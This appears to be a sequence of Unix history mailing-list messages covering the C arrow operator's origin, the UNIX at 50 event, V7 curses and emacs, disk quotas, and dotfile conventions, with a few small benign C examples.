Perhaps us old farts just aren't as discriminating as you
youngsters.
That said, I think Kevin's question
Is there a way to participate [on the UNIX50 event] without attending Usenix ATC?
is a good one.
Norman Wilson
Toronto ON
Bud Lawson, long an expat living in Sweden, died yesterday. Not a
Unix person, he was, however, the originator of a characteristic Unix
programmer's idiom.
Using an idea adapted from Ken Knowlton, Bud invented the pointer-
chasing arrow operator that Dennis Ritchie adopted for C. I played
matchmaker. When Bud first proposed the "based storage" (pointer)
facility for PL/I, he used the well-established field(pointer)
notation. I introduced him to the pointer-chasing notation Knowlton
devised for L6. Knowlton, however, had no operator because he had only
single-letter identifiers. What we now write as a->b->c, Knowlton wrote
as abc. Appreciating the absence of parentheses, Bud came up with the
wonderfully intuitive pointer->field notation.
Doug
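A tiny C sketch of why the notation was such a win (the struct names here are invented purely for illustration): the chain a->b->c versus the equivalent explicit-dereference spelling it replaced.
------8<------8<------8<------8<
/* arrow.c - the pointer-chasing notation Doug describes.
 * a->b->c is exactly (*(*a).b).c; the struct names are invented
 * purely for illustration.
 */
#include <stdio.h>

struct c_level { int value; };
struct b_level { struct c_level *c; };
struct a_level { struct b_level *b; };

int main(void)
{
    struct c_level c = { 7 };
    struct b_level b = { &c };
    struct a_level a = { &b };
    struct a_level *ap = &a;

    /* two spellings of the same chain of pointer dereferences */
    printf("%d %d\n", ap->b->c->value, (*(*(*ap).b).c).value);
    return 0;
}
------8<------8<------8<------8<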
I came across Scott Taylor’s site, which mentions his adventure with MtXinu (https://www.retrosys.net/). I had asked a few years ago (February 2017?) about locating a set
of this, to no avail, but thanks to Scott the binary set is now available.
ftp://ftp.mrynet.com/operatingsystems/Mach2.5/MtXinu-binary-dist/floppies/M…
There is some additional documentation to be found here.
ftp://ftp.mrynet.com/operatingsystems/Mach2.5/MtXinu-binary-dist/docs
The floppy support, like 386BSD’s, is super weak, and I had no luck with Qemu. VMware worked fine to install. The VMDK will run on Qemu as low as 0.90 just fine.
I haven’t tried the networking at all, so I don’t know about adapters/protocol support. I’ve been using a serial line to uuencode stuff in & out but it’s been stable.
We are all thrilled and thankful for the generosity of SDF and LCM+L by
sponsoring and providing a celebration of Internet History with their UNIX
at 50 Event for the USENIX ATC Attendees. We understand not all of you
can participate in the conference, but would still like to be part of the
celebration. Our hosts have graciously opened the event to the community
at large, as I said in my previous message, it should be an evening of
computer people being able to be around and discussing computer history.
However, if you are not planning to attend the conference but wish to
attend the evening's event, we wish that you would at least consider
joining one or more of the organizations to help support them all in the
future. All three organizations are member supported and need all our help
and contributions to function and bring their services to everyone today
and hopefully 50 years from now. Membership details for each can be found
at Join SDF <https://sdf.org/join>, LCM+L Memberships
<https://livingcomputers.org/Join/Memberships.aspx>, and USENIX Association
Memberships <https://www.usenix.org/membership-services>
I've been playing with simh recently, and there is a nonzero chance I will
soon be acquiring a PDP-11/70.
I realize I could run 2.11BSD on it, and as long as I stay away from a
networking stack, I probably won't see too many coremap overflow errors.
But I think I'd really rather run V7.
However, there's one thing that makes it a less than ideal environment for
me. I grew up after cursor-addressable terminals were a thing, and, even
if I can eventually make "ed" do what I want, it isn't much fun. I've been
an Emacs user since 1988 and my muscle memory isn't going to change soon
(and failing being able to find and build Gosmacs or an early GNU Emacs,
yes, I can get by in vi more easily than in ed; all those years playing
Nethack poorly were good for something).
So...where can I find a curses implementation (and really all I need in the
termcap or terminfo layer is ANSI or VTxxx) that can be coerced into
building on V7 pretty easily?
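As a point of reference (not an answer to the curses question), the cursor addressing itself needs nothing beyond printf if the terminal speaks ANSI/VT100; here is a minimal sketch in modern C. On V7 it would need K&R-style declarations, and the escape sequences are assumed rather than looked up from termcap.
------8<------8<------8<------8<
/* ansi_cup.c - bare-bones cursor addressing with ANSI/VT100 escapes,
 * the sort of thing a minimal termcap layer would emit for "cm".
 * Illustrative sketch only; row/col are 1-based in the escape sequence.
 */
#include <stdio.h>

static void cls(void)                { printf("\033[2J"); }
static void moveto(int row, int col) { printf("\033[%d;%dH", row, col); }

int main(void)
{
    cls();
    moveto(10, 20);
    printf("hello from row 10, column 20");
    moveto(24, 1);                   /* park the cursor at the bottom */
    fflush(stdout);
    return 0;
}
------8<------8<------8<------8<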
Also, I think folks here might enjoy reading a little personal travelogue
of some early Unix systems from my perspective (which is to say, a happy
user of Unix for 30+ years but hardly ever near core development (I did do
the DIAG 250 block driver for the zSeries port of OpenSolaris; then IBM
pushed a little too hard on the price and Sun sold itself to (ugh) Oracle
instead; the world would have been more fun if IBM had bought the company
like we were betting on)). That's at
https://athornton.dreamwidth.org/14340.html ; that in turn references a
review I did about a year ago of The Unix Hater's Handbook, at
https://athornton.dreamwidth.org/14272.html .
Adam
> From: Mary Ann Horton
> Warren's emacs would have been part of the Bell Labs 'exptools'
> (experimental tools) package ... it's possible that's what you have.
I don't think so; Warren had been a grad student in our group, and we got it
on that basis. I'm pretty sure we didn't have termcap or any of that stuff.
Noel
I'm reminded since Erik brought this up...
Is Warren Montgomery's emacs available, like, anywhere... I used it long
ago on V7m, and I had it on my AT&T 7300 (where it was available as a
binary package).
It's the first emacs I ever used. I don't recall where we got it for the
PDP-11. On our system, we had it permission-restricted so only certain
trusted users could use it - basically, people who could be trusted not to
be in it all the time, and not to use it while the system was busy. We
had an 11/40 with 128K, and 2 or 3 people trying to use Montgomery emacs
would basically crush the system...
In the absence of that, I've always found JOVE to be the next best thing,
as far as being lightweight and sufficiently emacs-like. I actually
install it on almost all of my Linux systems. Did JOVE ever run on V7?
--Pat.
> From: Pat Barron
> Is Warren Montgomery's emacs available, like, anywhere...
I've got a copy on the dump of the MIT PWB system. I'm actually supposed to
resurrect it for someone, IIRC, (the MIT system was .. idiosyncratic, so it'll
take a bit of tweaking), but haven't gotten to it yet.
Does anyone else have the source, or is mine the only one left?
Noel
Sorry for the long delay on this notice, but until this weekend there were
still a few things to iron out before I made a broad announcement.
First, I want to thank the wonderful folks at the Living Computers Museum
and Labs <https://livingcomputers.org/> who are set up to host an event at
their museum for our members on the evening of July 10, which is during the
week of USENIX ATC. To quote an email from their Curator, Aaron Alcorn: "*an
easy-going members events with USENIX attendees as their special invited
guests.*" As Aaron suggested, this event will just be computer people
and computers, which seems fitting and a good match ;-)
Our desire is to have as many of the old and new 'UNIX folks' at this event
as possible and we can share stories of how our community got to where we
are. Please spread the word, since we want to get as many people coming
and sharing as we can. BTW: The Museum is hoping to have their
refurbished PDP-7 running by that date. A couple of us on this list will
be bringing a kit of SW in the hopes that we can boot Unix V0!!
Second, USENIX BOD will provide us a room at ATC all week long to set up
equipment and show off some things our community has done in the past. I
have been in contact with some of you offline and will continue to do so.
There should be some smaller historical systems that people will bring
(plus connections to the LCM's systems via the Internet, of course) and
there will be some RPi's running different emulators.
I do hope that both the event and the computer room should be fun for all.
Thanks,
Clem Cole
I think it was BSD 4.1 that added quotas to the disk system, and I was just wondering if anyone ever used them, in academia or industry. As a user and an admin I never used this and, while I thought it was interesting, just figured that the users would sort it out amongst themselves. Which they mostly did.
So, anyone ever use this feature?
David
Several list members report having used, or suffered under, filesystem
quotas.
At the University of Utah, in the College of Science, and later, the
Department of Mathematics, we have always had an opposing view:
Disk quotas are magic meaningless numbers imposed by some bozo
ignorant system administrator in order to prevent users from
getting their work done.
Thus, in my 41 years of systems management at Utah, we have not had a
SINGLE SYSTEM with user disk quotas enabled.
We have run PDP-11s with RT-11, RSX, and RSTS, PDP-10s with TOPS-20,
VAXes with VMS and BSD Unix, an Ardent Titan, a Stardent, a Cray
EL/94, and hundreds of Unix workstations from Apple, DEC, Dell, HP,
IBM, NeXT, SGI, and Sun with numerous CPU families (Alpha, Arm, MC68K,
SPARC, MIPS, NS 88000, PowerPC, x86, x86_64, and maybe others that I
forget at the moment).
For the last 15+ years, our central fileservers have run ZFS on
Solaris 10 (SPARC, then on Intel x86_64), and for the last 17 months,
on GNU/Linux CentOS 7.
Each ZFS dataset gets its space from a large shared pool of disks, and
each dataset has a quota: thus, space CAN fill up in a given dataset,
so that some users might experience a disk-full situation. In
practice, that rarely happens, because a cron job runs every 20
minutes, looking for datasets that are nearly full, and giving them a
few extra GB if needed. Within an average of 10 minutes or so, affected
users will no longer see disk-full problems. If we see serious imbalance
in the sizes of previously similar-sized datasets, we manually move
directory trees between datasets to achieve a reasonable balance, and
reset the dataset quotas.
We make nightly ZFS snapshots (hourly for user home directories), and
send the nightlies to an off-campus server in a large datacenter, and
we write nightly filesystem backups to a tape robot. The tape technology
generations have evolved through 9-track, QIC, 4mm DAT, 8mm DAT, DLT,
LTO-4, LTO-6, and perhaps soon, LTO-8.
Our main fileserver talks through a live SAN FibreChannel mirror to
independent storage arrays in two different buildings.
Thus, we always have two live copies of all data, and a third far-away
live copy that is no more than 24 hours old.
Yes, we do see runaway output files from time to time, and an
occasional student (among currently more than 17,000 accounts) who
uses an unreasonable amount of space. In such cases, we deal with the
job, or user, involved, and get space freed up; other users remain
largely unaware of the temporary space crisis.
The result of our no-quotas policy is that few of our users have ever
seen a disk-full condition; they just get on with their work, as they,
and we, expect them to do.
-------------------------------------------------------------------------------
- Nelson H. F. Beebe Tel: +1 801 581 5254 -
- University of Utah FAX: +1 801 581 4148 -
- Department of Mathematics, 110 LCB Internet e-mail: beebe(a)math.utah.edu -
- 155 S 1400 E RM 233 beebe(a)acm.org beebe(a)computer.org -
- Salt Lake City, UT 84112-0090, USA URL: http://www.math.utah.edu/~beebe/ -
-------------------------------------------------------------------------------
I used the fair-share scheduler while a sysadmin of a small Cray at UNSW. Being an expensive machine, the various departments who paid for it wanted, well, their fair share.
In a different job I had a cron job that restricted the Sybase backend engines to a subset of the CPUs on a big SGI box during peak hours; at night Sybase had free rein of all CPUs.
Has anyone done anything similar?
-Steve
> From: KatolaZ
> I remember a 5MB quota at uni when I was an undergrad, and I definitely
> remember when it was increased to 10MB :)
Light your cigar with disk blocks!
When I was in high school, I had an account on the school's computer, a
PDP-11/20 running RSTS, with a single RF11 disk (well, technically, an RS11
drive on an RF11 controller). For those whose jaw didn't bounce off the floor,
reading that, the RS11 was a fixed-head disk with a total capacity of 512KB
(1024 512-byte blocks).
IIRC, my disk quota was 5 blocks. :-)
Noel
----- Forwarded message from meljmel-unix(a)yahoo.com -----
Warren,
Thanks for your help. To my amazement in one day I received
8 requests for the documents you posted on the TUHS mailing
list for me. If you think it's appropriate you can post that
everything has been claimed. I will be mailing the Unix TMs
and other papers to Robert Swierczek <rmswierczek(a)gmail.com>
who said he will scan any one-of-a-kind items and make them
available to you and TUHS. The manuals/books will be going
to someone else who very much wanted them.
Mel
----- End forwarded message -----
> That photo is not Belle, or at least not the Belle machine that the article is about.
The photo shows the piece-sensing (by tuned resonant circuits)
chess board that Joe Condon built before he and Ken built the
harware version of Belle that reigned as world computer chess
champion for several years beginning in 1980 and became the
first machine to earn a master rating.
Doug
> From: "John P. Linderman"
> Brian interviewing Ken
Ah, thanks for that. I had intended going (since I've never met Ken), but
alas, my daughter's family had previously scheduled to visit that weekend, so
I couldn't go.
The 'grep' story was amusing, but historically, probably the most valuable
thing was the detail on the origins of B - DMR's paper on early C ("The
Development of the C Language") mentions the FORTRAN, but doesn't give the
detail on why that got canned, and B appeared instead.
Noel
Decades ago there was an interpreted C in an X10 or X11 app, I believe it
came from the UK. And maybe it wasn't X11, maybe it was Sunview?
Whatever it was the author didn't like the bundled scrollbars and had
their own custom made one.
You could set breakpoints like a debugger and then go look around at state.
Does anyone else remember that app and what it was called?
Bakul Shah:
This could've been avoided if there was a convention about
where to store per user per app settings & possibly state. On
one of my Unix machines I have over 200 dotfiles.
====
Some, I think including Ken and Dennis, might have argued
that real UNIX programs aren't complex enough to need
lots of configuration files.
Agree with it or not, that likely explains why the Research
stream never supplied a better convention about where to
store such files. I do remember some general debate in the
community (e.g. on netnews) about the matter back in the
early 1980s. One suggestion I recall was to move all the
files to subdirectory `$HOME/...'. Personally I think
$HOME/conf would have been better (though I lean toward
the view that very few programs should need such files
anyway).
But by then the BSD convention of leaving `hidden' files
in $HOME had spread too far to call
back. It wouldn't surprise me if some at Berkeley
would rather have moved to a cleaner convention, just
as the silly uucp-baud-rate flags were removed from
wc, but the cat was already out of the bag and too
hard to stuff back in.
On the Ubuntu Linux systems I help run these days, there
is a directory $HOME/.config. The tree within has 192
directories and 187 regular files. I have no idea what
all those files are for, but from the names, most are
from programs I may have run once years ago to test
something, or from programs I run occasionally but
have no context I care about saving. The whole tree
occupies almost six megabytes, which seems small
by current standards, but (as those on this list
certainly know) in the early 1980s it was possible
to run a complete multi-user UNIX system comfortably
from a single 2.5MB RK05 disk.
Norman Wilson
Toronto ON
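For anyone curious how such a count might be reproduced, here is a small sketch using nftw(3) to tally directories, regular files, and bytes under $HOME/.config. This is my illustration of one way to get such numbers, not the command Norman actually ran.
------8<------8<------8<------8<
/* confcount.c - count directories, regular files and bytes under
 * $HOME/.config.  A sketch of how one might reproduce numbers like
 * those quoted above; not the tool actually used.
 */
#define _XOPEN_SOURCE 500
#include <ftw.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>

static long ndirs, nfiles;
static long long nbytes;

static int tally(const char *path, const struct stat *sb,
                 int type, struct FTW *ftwbuf)
{
    (void)path; (void)ftwbuf;
    if (type == FTW_D)
        ndirs++;
    else if (type == FTW_F) {
        nfiles++;
        nbytes += sb->st_size;
    }
    return 0;                        /* keep walking */
}

int main(void)
{
    char dir[4096];
    const char *home = getenv("HOME");
    if (home == NULL)
        return 1;
    snprintf(dir, sizeof dir, "%s/.config", home);

    if (nftw(dir, tally, 32, FTW_PHYS) == -1) {
        perror(dir);
        return 1;
    }
    printf("%s: %ld directories, %ld regular files, %lld bytes\n",
           dir, ndirs, nfiles, nbytes);
    return 0;
}
------8<------8<------8<------8<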
Dennis's `The UNIX I/O System' paper in Volume 2 of the 7/e
manual is basically about how drivers work. Is that near
enough, possibly as augmented by Ken's `UNIX Implementation'
paper in the same book?
Those were my own starting point, long ago, for understanding
how to write device drivers. Along with existing source code
as examples, of course, but (unlike many who hack on device
drivers, I'm afraid) I have always preferred to have a proper
statement of rules, conventions, and interfaces rather than
just reading code and guessing.
Norman Wilson
Toronto ON